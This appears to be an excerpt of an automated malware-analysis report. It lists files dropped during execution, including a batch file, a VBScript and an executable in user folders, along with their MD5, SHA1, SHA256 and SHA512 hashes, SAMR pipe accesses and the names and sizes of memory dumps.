SHA16a2d9e5fa9a031d46abe368d0f37c323b7fdc8d4
SHA25670a86b3d8e18e3bec2b33874a84bf09155b896f89dc7088b8a1a8324996eb0ae
SHA51234b09c84d5d7690d5012048f3ddfed4421484f0f05bd9716d3ffc05e595c20e9cb7fabea0f530b81ded668f874c7fef686afd3f0d0559c6e7e1576fecd719683
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.batMD5
5c33afac78dc3bb35f1d2f48e23456ce
SHA179081c8ed707cf527e14d7b934b83e62a933b0d8
SHA2561d1f284c9317e4e268e7ea4b129f557af90a2cc1861ee62d1b988636856aa552
SHA512ab273abc5e4a320daf79f166286687574b9a5c1cce5e31f24e2d97ab8ccf98a18e41f64bcd6af8efbe7a7268681a94b4d6accad13dd3b9e56ba8133f61da97c4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbsMD5
4c9bf0719250bbbf5a44ad421e0c00f4
SHA1dd686bfa711732d30611b0bdcc1f270ba3828180
SHA25612bc4a0eae0555b0850cb271bae5cc660bf7551750e3c7ae9a0fb7843e0d302f
SHA512d5dce8489a39c0e44c6f77f154f0caa3ce51ffe345d0862ccdf594711ea2b45c4aa5fe61a4a50ba5de2612fa7752971186281426f8a841d8e03b24cb895b85d0
-
C:\Users\Public\j4dsucc1.exeMD5
bb9c7628c643c5232a64a45b8814bff2
SHA112eded5c10f86eb3050a8b4f0ae2b17de58c70a9
SHA256c7667ceb0efa8aa8b7bd763d779424b5445ca9f56b9e526a395f4044ba4acc69
SHA51285ea8886b72137c18c442f6239211cb7a27da9fdfeba43bf848fd72ece8b37424f2c3c651aae560f5e6381fe05483fbe838a92277b17267aae49bd15e999b287
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Public\552pku1a.infMD5
17f41655ae1f701adfddafa57d304a28
SHA15ee5f8fc880fc6b2d160aecd8c38d1377f3ec431
SHA25680d0a556bdc500f1bdc9443af7b197fc3df06a5c0a2482f10d70f5b91524985d
SHA5120c78565f97dce119990de9bcf7df087948f9a2e6a20483097c2e6394257ed3a5c5544d2bf0125a2d50881d224e37a757a443f97fb3de3754f825a7347c9b9675
-
\??\c:\Users\Public\j4dsucc1.exeMD5
bb9c7628c643c5232a64a45b8814bff2
SHA112eded5c10f86eb3050a8b4f0ae2b17de58c70a9
SHA256c7667ceb0efa8aa8b7bd763d779424b5445ca9f56b9e526a395f4044ba4acc69
SHA51285ea8886b72137c18c442f6239211cb7a27da9fdfeba43bf848fd72ece8b37424f2c3c651aae560f5e6381fe05483fbe838a92277b17267aae49bd15e999b287
-
memory/820-58-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmpFilesize
8KB
-
memory/968-64-0x0000000075AB1000-0x0000000075AB3000-memory.dmpFilesize
8KB
-
memory/1688-59-0x0000000002446000-0x0000000002465000-memory.dmpFilesize
124KB
-
memory/1688-55-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmpFilesize
4KB
-
memory/1688-54-0x000007FEF2EA0000-0x000007FEF3F36000-memory.dmpFilesize
16.6MB
-
memory/1688-56-0x0000000002440000-0x0000000002442000-memory.dmpFilesize
8KB